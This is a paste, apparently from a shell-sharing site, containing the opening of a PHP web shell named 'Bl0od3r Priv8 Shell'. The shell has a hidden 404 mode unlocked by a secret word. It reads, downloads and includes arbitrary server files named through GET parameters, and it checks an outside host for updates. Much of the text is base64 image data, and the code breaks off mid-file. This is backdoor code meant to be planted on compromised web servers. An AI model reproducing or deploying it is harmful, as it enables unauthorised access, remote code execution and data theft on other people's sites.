Bl0od3r Priv8 Shell - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 5:01 a.m.

FORMAT: Text only

SIZE: 50.8 kB

HITS: 836

  1. <?PHP
  2. /*
  3. ver=5
  4. ----------------------Only For Priv8 Use---------------------------------
  5. I dont support illegal actions!
  6. -------------------------------------------------------------------------
  7. dC3 Security Crew
  8. -------------------------------------------------------------------------
  9. By turning "on" safe you can make your shell in 404 Not Find mode if the user doesnt know your OWN set word!
  10. -------------------------------------------------------------------------
  11. Shell written by Bl0od3r
  12. -------------------------------------------------------------------------
  13. Easy file managing with a lot of features!
  14. -------------------------------------------------------------------------
  15. In work:
  16. special file options
  17. -------------------------------------------------------------------------
  18. */
  19. //important
  20. error_reporting(5);
  21. @ignore_user_abort(true);
  22. //
  23. $safe="off";
  24. $word="secret";
  25. if ($safe=="on") {
  26. if (!isset($_GET[$word])) {
  27. header('HTTP/1.0 404 Not Found');
  28. exit;
  29. }
  30. }
  31. $made_by="Bl0od3r";
  32. $of="Netplayazz";
  33. ($made_by=="Bl0od3r") ? $fake=0 : $fake=1;
  34. ($of=="dc3") ? $fake=0 : $fake=1;
  35. $st_dir=".";
  36. $p=str_replace("\\","/",realpath($_GET['file']));
  37. $j_d=$_GET['file'];
  38. $j_f=$_GET['file'];
  39. $filename = $_GET['file'];
  40. $file_info = pathinfo($filename);
  41. $extn = $file_info['extension'];
  42. if (isset($_GET['dir'])) {
  43. $images = array(
  44. "download"=>
  45. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  46. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  47. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  48. "ext_wri"=>
  49. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  50. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  51. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  52. "small_dir"=>
  53. "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
  54. "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
  55. "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  56. "dir"=>"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAkFBMVEX////MmTT/zGezgRvLmDN/
  57. f3/AjSi6hyK9iiWgbghra2vCjyr/5oGufBbHlC+jcQuwfhiIiIjJljGcagS1gh24hSCebAaZZwGa
  58. aAK0gRzvvFfcqUT4xWC8iSRKSkqreRPCwsK/jCeodhDms06lcw23hB/ToDv/1G//4HvFki3/64X/
  59. 95Fqamr//////5n/9I54UBIWAAAAAXRSTlMAQObYZgAAAAFiS0dELc3aQT0AAAAWdEVYdFNvZnR3
  60. YXJlAGdpZjJwbmcgMi40LjakM4MXAAAAiUlEQVR42oXOxxKCMBgE4CWhVwEp9i4Ekt/3fzuDE0Yd
  61. D3633dnDAr8su0i/stKi40cmTfnebckXU2GPj8k0U0mui2KIxYu7q1acA2kv1CxWWQ7RWTTbUhAi
  62. YjaNxppqCZcJGowLlRI+O1FvbKiV8FhFnXGnJgT0n+RwvmZBXbbN3tFPHPnm4L8nl3EWVP90I8IA
  63. AAAASUVORK5CYII=",
  64. "o.b" => "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+IMWElDQ19QUk9GSUxFAAEB
  65. AAAM***pbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA
  66. AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  67. AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw
  68. dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw
  69. ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA
  70. AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA
  71. AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA
  72. EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA
  73. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA
  74. ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA
  75. t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu
  76. Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  77. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
  78. IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
  79. IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA
  80. LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS
  81. ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA
  82. AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM
  83. CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU
  84. IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo
  85. AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA
  86. +wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5
  87. AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC
  88. wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG
  89. BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF
  90. pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG
  91. B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ
  92. zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc
  93. DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP
  94. Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj
  95. EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW
  96. bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3
  97. Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf
  98. Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw
  99. JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp
  100. aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k
  101. L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01
  102. hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn
  103. PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD
  104. fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM
  105. S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT
  106. X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl
  107. XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll
  108. PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E
  109. bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5
  110. KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6
  111. hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P
  112. No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV
  113. m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n
  114. bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl
  115. tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB
  116. 48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4
  117. 0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze
  118. ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c
  119. 7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9
  120. uv5L/tz/bf///+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAARtgAAF0YAABuaAAAgJv/bAIQAAgIC
  121. AgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwM
  122. DAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwM
  123. DAwMDAwMDAwMDAwM/8IAEQgAHgK8AwERAAIRAQMRAf/EALsAAQACAwEBAAAAAAAAAAAAAAADBQIE
  124. BgEHAQEAAAAAAAAAAAAAAAAAAAAAEAACAgMBAQADAQEBAAAAAAAAEwQFAiIDARQREhWAIyQRAAAE
  125. BQIDBwMBBwUAAAAAAAABAgMx0ZMENBEhEhMzQVFhkZLS4nGBIuEQQKGxYmMUMkKiIyQSAQAAAAAA
  126. AAAAAAAAAAAAAIATAAIBAgYDAAIDAQEAAAAAAAERACFRMUFhodHxEHGR8IFQgMGxMP/aAAwDAQAC
  127. EQMRAAAB+DlmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADmDnDbAAAAAAAAANg+hkJr
  128. mwCrNcwK8rzvwZFCbZgYFaWJyR0ZAWpYmZCaJrkpWm8WRXG4RmkRnOnUghOlMDwyPCkNQyOeAAAA
  129. AAAAKgoSUAAAAAAAAAlO1PQeA1DwgN8hJDly4NY1SMgL8ozWL0ri5MCpOkMyIhKMti0OMLMvCMHI
  130. nTk5ARFUdSSnhqkxrHJAAAAAAAAGoVR6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADA
  131. /9oACAEBAAEFAoXOu9hqrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKr
  132. BVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrB
  133. VYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBVYKrBV
  134. YKrBVYLg/wBmP2/HB48ePHjx48ePHjx48ePHjx5y6/v0zjxsMkxzlyj9JKY4mOYfHyh/ZUj4HXOd
  135. ljwlYdv2z8jR3pjnzxvcOnsbjhx7Vnfr1kVfLpzw5yY/yzjnHzwjvIWPknl8s4jRc/xz4R0JjnWN
  136. wZ1kVfLp9lSc8eUnl8s495fPDw4cMu3suq89j9KyT1x8i8o/2Vh17xcuDyH8+Ub7Kk6S633D543m
  137. KY5lGj/QmOJjmePLyJh+ntfxXnBePHjx48ePHjx48ePHjx43/wB+HX8YOHDhw4cOHDhw4cOHDhw4
  138. cOMO2Pmf9WAf1oB5d8fp/qwD+rAOdnE9i/bUGc6Bj71sqztn5Oqcfc7nDLL7pBxtPxHkz8e3CJM8
  139. jyJErzt3xldMDja5YRspnbLxxFsfI/H7pBEtfeJItPenL7pB5cY/jOwqumf21B5Z8efL7pBjZ/mJ
  140. hc8sevvf8+wp2MaRhaxfeX21B2s4vyOIdlw48PtqDpMrPecq0y7H3yPD+zx9le20D0/qwDnaRVeW
  141. dd5w6WcTyK4cOHDhw4cOHDhw4cOHDhn/AH8/b8bm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm
  142. 5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm
  143. 5t+3/9oACAECAAEFAv8AMH//2gAIAQMAAQUC/wAwf//aAAgBAgIGPwIwf//aAAgBAwIGPwIwf//a
  144. AAgBAQEGPwK047K3Uvko4lG2kzM+EvAYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFt
  145. SRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIY
  146. FtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSR
  147. IYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFt
  148. SRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIY
  149. FtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSR
  150. IYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFtSRIYFt
  151. SRIYFtSRIYFtSRIaf4jHJ/wteXy08PFzI6aRDJawQn+QiIiIiIiIiIiIiIiIiIiIiIiIiG0meylE
  152. RjQrR5z+pKtv4qGDceZe8Otmy4hKGyMm1Hvr5jBuPMveMG48y94ZuLhK1m6f+0/1IdF7z+QZbZbc
  153. SpbqSVxH2Ge/aHWm9kp00L7EEEcDMiMXKeWpRNJQaUke++viMG48y94dP/HdZ4UmZKUclGLB1xKj
  154. Q8lRvER7nsWgS0hp0lLhqfyC21NO8SD0PQ/kLpy3QrjSv/pSZ9m3iOifmUxdOXKDSpCdWd/qIi72
  155. 4nG0lyt+09R0T8ymHjumzSSUao37fsGFmw68pxBKUaT7y+pDBuPMveLQiStsnlGS0Ge8NQttTTvE
  156. g9D0P5DovefyF2u3QrVJlyEme/8AMdE/Mph165SZOmfC0nWQtkaHwuMcxe8T2BlyXtvH5AmkNOko
  157. +0z/AFDjzyVOcLpo2PuPQY7vq/ULWxbPJ025p7pL6iIfubglKJo9NEmOi95/IK5bTpOafgZ9/qDf
  158. /mdd4kkZmg5qIYNx5l7xbI4VJS6hRqQZ77aDCfPx1L3jBuPMveLh4kmlaHjQkjOBawDtwfUS5wke
  159. vZsLl8+o2eiT1+giIiIiIiIiIiIiIiIiIiIiIji/saf8ggu4i/dEmvdOv5F4DpXFRXuHSuKivcHX
  160. jbXwLbJBEUR0rior3DpXFRXuDVvcsKc5UND/AFIYbnqP3BpdtbLQ424lWpn2F2RMG45auKWqJ6/I
  161. EorNzUty/L5C8USVJN9CUtH3aazHXc9Ri4t3zW4TpfgrWB/cWjSSMjt0mSjP7SDbytTJESIOulsS
  162. 1GZEY/BxSNY6HoLhpa3FOOdNesBop5ai7jM/2XSPy430kSFF2aazHXc9Rh7nKW7zEcKd9dPMWqGl
  163. Lb5LfCvfTWHcOu56jFlqSlKtj1cM+3bQKWu0cNSz1UfF8hhueo/cLtphK2+cZG1v/p0+467nqMPW
  164. z/E4aj1aXHQ/uLdzgXo0zyzhHYGfeEvLI1EnXYvEOM3DKnEKdUstD79+8YbnqP3By1tmVNk4ZGep
  165. /TxPu/Y7b3DanEOnrsMNz1H7gsmrVaXDL8FGo9j9Qa5K1tEhBJUWum/2HXX6jDVyaF6pb4HE7R8B
  166. ryrjf+4r3DpXFRXuD7DzS1NuOmtO++nZruFW5W7vKWriMte3zDttbMrRzYmo/wBy4v6NP4gthAQE
  167. BAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQE
  168. BAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEN9B//9oACAEBAwE/ITmZHr8Akmok/wAMoUKFChQo
  169. UKFChQoUKFChQoUKFChQoUKFChQoUKFChQo/hVChQoUKFChQoUKFChQoUKFChQoUKFChQoUKFChQ
  170. oUKFH/ooUKFChQoUKFChR+KCLQoo4XJi+BHh4eHh4eHh4eHh4eHh4eHh4eHgJWFfsiVCgQGUb4nb
  171. wmxRIsYnAgxX35TJiOvw1GctDwYT/Q1CkChxkFXCTibP3Hq+MEytZr7GumFvCYuwjDTAygIoSEwU
  172. DIzMNthFSoHkUJllnoMWg+IAFJFYg4MH4MBPrIc6bA+o8Hp1mE+nTwYfbAtr2gQQoOhAc7/hMC9M
  173. Ko1DbIwmWWegxZh4MP3D6AoG8F/BgIKLkjzq9n9Q9qAH/A4SDSUAjlJCQoHkcX2vpFIZjxiT0GAM
  174. SmGCZGBjwtBNAKphUX8GBs2JigyOqMzAVUyPATAgGD1DSwJveEZIpjgWfBNWObIAIYMhiVeLtl6f
  175. 3BBZIbSg0fuPDw8PDw8PDw8PDw8PDw8PDw+L+UysmC2ntPae09p7T2ntPae09p7T2ntPae09p7T2
  176. ntGiDEjxLVHhuAEEMFRWms0XhgJJJrr5z533sSSg2a0Jn4CEuISyCVmrGif5V4aCFAAwEGaFBGNR
  177. ARWkIZDUa7J+Vf7D59qhVm2GEXo6xEkYIBaXJxFQRnGi4ugAmOdYJvkupHf2S4RHHE0PhM9obdQK
  178. mxDWPyr/AGAhHEDiL1QkfEcIIAGG0n5V/sFf9JDGVBeucOkYwDJ0HgEAzS0VAjZqn5V/sGe1tWBc
  179. lgx/2G4RPxHMFcKSs2ImCcEBS6FnBmZNFCRoMPATHzyoMEiakyT2gDKSBq1MQcvAQ2DIIBkHFDmc
  180. mkGdUBQIeKjslRwQKDdVCBJhM0vHOKK84xhBAizCvMDYDvBnVlGOkCwGI1Np7T2ntPae09p7T2nt
  181. Pae09p7T2ntPae0vJCpCSpHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dza
  182. O5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dza
  183. O5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dza
  184. O5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR3No7m0dzaO5tHc2jubR5ixpP/9oA
  185. CAECAwE/If6wf//aAAgBAwMBPyH+sH//2gAMAwEAAhEDEQAAEBJJJJJJJJJJJJJJJJJJJJJJJJJJ
  186. JJJJJJJJJJJJJJJJJBJJJJJJJJJAIJBJBJAAIJJJBIJBBBJJBJJBJJJJJJJJJBJJJJJJJJJAIJJB
  187. JJJBJJIBBIJIJIIIJJIJJJJJJJJJJBJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJIP/a
  188. AAgBAQMBPxApS1RSHwsCSSyf4aLFixYsWLFixYsWLFixYsWLFixYsWLFixYsWLFixYsWL/CxYsWL
  189. FixYsWLFixYsWLFixYsWLFixYsWLFixYsWLFixf/AEixYsWLFixYsWLF4Oluyo1TCNWFPdlNd9mu
  190. +zXfZrvs132a77Nd9mu+zXfZrvs132a77Nd9mu+zXfZrvs132a77Nd9hDoCEIDJH0YKJQIKsDpgW
  191. BfgWUacgTAkoAgLreSxYtgGTAgEigAAvbnQJqy1XRBCSCWEVMchsge1InEoImkEAkMAH/sdKetgQ
  192. kASVTK8FiNrM/AhGUmWFC84tGEEIJ5RFIeaZNEkqJGAtGH9aGVEkQK9iYINvSQJEWxHx2GpQBhIZ
  193. Bwa5prvsetQWpqEgLI4+OzcwGApE5roM4Eu/YDCCBAMieFfBZSsOoDACQEHAbkYf0IZUWIX6nQJO
  194. w62AFEGLNU+OxSbDMMAANgOKD/1AqpAOSsWwMaELlEEQCYKpJE9qwuJkvAWgb+ClcKADkz4Up5Qz
  195. TxEJQAcyJrvsqBdIAhhBpJzmdAkR8IeVKsg9DCCV0agEguPOgXgsWiK8GNikQ4KIUpBfAIBQg4hg
  196. UfXgsdzaMhkEYAkEs+4YONNACBEVI48oB1UQAmcCjixmu+zXfZrvs132a77Nd9mu+zXfZrvs132a
  197. 77Nd9mu+zXfZrvs132a77M4vHcD0bsgCNLS0tLS0tLS0tLS0tLS0tLS0tIQCaCCAiIIRIYxgGAAE
  198. DASu6kMCYrUEwf3KKyAa4AFNgEfJ07XjXnEUNgCkGnjzgoF87YASAqpafa6qSEAUEPAOQwIwUTBq
  199. M4GXOYNycAq0VeCVEHAwaqASwJA3vKOkSCoKklVYxMho3wRgMTBArTKiAKJDmW1ZMYNg04tgNRQA
  200. GRfqJaO7aLDIEaRCItkwsQioJeCRUlgMCuoUccoQc7MHmIirHwSa3ykQMExEkVRUH0VJkoAfoePN
  201. LB4gFFJyQcCcfBIXbhwohAYUGGRgsMQ9QNhxcYrSACA4olyporJJQTAYmCrSWztEgkcivHkkjWVT
  202. KECVLCNI5BU2AAEisiJBB8eTTWGAFQEBAOhizrgQGlgEml44rQwwYrgUMIDTlBFQzCyW1RRpsEBM
  203. llACB+vB1rBwQDohIMs84NBEfCBQcNho4ThDyEQUlvwUCNLS0tLS0tLS0tLS0tLS0tLS32X3K0CG
  204. YwXud1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1
  205. yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3
  206. XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yn
  207. dcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcpi/Yhm9z//2gAI
  208. AQIDAT8Q/rB//9oACAEDAwE/EP6wf//Z");
  209. header("Content-type: image/gif");
  210. header("Cache-control: public");
  211. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  212. header("Cache-control: max-age=".(60*60*24*7));
  213. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  214. echo base64_decode($images[$_GET['pic']]);
  215. }
  216. $ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
  217. //file_array
  218. $file_tps=array(
  219. "img"=>array("jpg","bmp","gif","ico"),
  220. "act" => array("edit","copy","download","delete"),
  221. "zip" => array("gzip","zip","rar")
  222. );
  223. $surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
  224. if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  225. if (empty($surl))
  226. {
  227. $surl = "?".$includestr; //Self url
  228. }
  229. $surl = htmlspecialchars($surl);
  230. @ob_clean();
  231. //end
  232. if (isset($_GET['img'])) {
  233. for ($i=0;$i<4;$i++) {
  234. if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
  235. header("Content-type: ".$inf["mime"]);
  236. readfile(urldecode($filename));
  237. exit;
  238. }
  239. }
  240. }
  241. if (!function_exists(download)) {
  242. function download($file) {
  243. header('Pragma: anytextexeptno-cache', true);
  244. header('Content-type: application/force-download');
  245. header('Content-Transfer-Encoding: Binary');
  246. header('Content-length: '.filesize($file));
  247. header('Content-disposition: attachment;
  248. filename='.basename($file));
  249. readfile($file);
  250. exit;
  251. }
  252. }
  253. if (isset($_GET['download'])) {
  254. download($filename);
  255. exit;
  256. }
  257. if (isset($_GET['run'])) {
  258. echo urldecode($_GET['file']);
  259. include(urldecode($_GET['file']));
  260. exit;
  261. }
  262. function check_update()
  263. {
  264. $cur_ver=5; //very important value for updates!Please dont change!
  265. $newer=$cur_ver+1;
  266. $url="http://dc3.dl.am/";
  267. $file=@fopen($url."".$newer.".txt","r") or die ("No updates aviable!");
  268. $text=fread($file,1000000);
  269. if (preg_match("/ver=".$newer."/i", $text)) {
  270. echo "[+]Update Aviable!...Please download new version from:";
  271. echo "<br><a href=".$url.$newer.".txt>Version ".$newer."</a>";
  272. } }
  273. function get_perms($mode)
  274. {
  275. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  276. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  277. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  278. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  279. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  280. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  281. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  282. else {$type = "?";}
  283. $owner["read"] = ($mode & 00400)?"r":"-";
  284. $owner["write"] = ($mode & 00200)?"w":"-";
  285. $owner["execute"] = ($mode & 00100)?"x":"-";
  286. $group["read"] = ($mode & 00040)?"r":"-";
  287. $group["write"] = ($mode & 00020)?"w":"-";
  288. $group["execute"] = ($mode & 00010)?"x":"-";
  289. $world["read"] = ($mode & 00004)?"r":"-";
  290. $world["write"] = ($mode & 00002)? "w":"-";
  291. $world["execute"] = ($mode & 00001)?"x":"-";
  292. if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  293. if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  294. if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  295. echo $type.join("",$owner).join("",$group).join("",$world);
  296. }
  297. if (!function_exists(get_space)) {
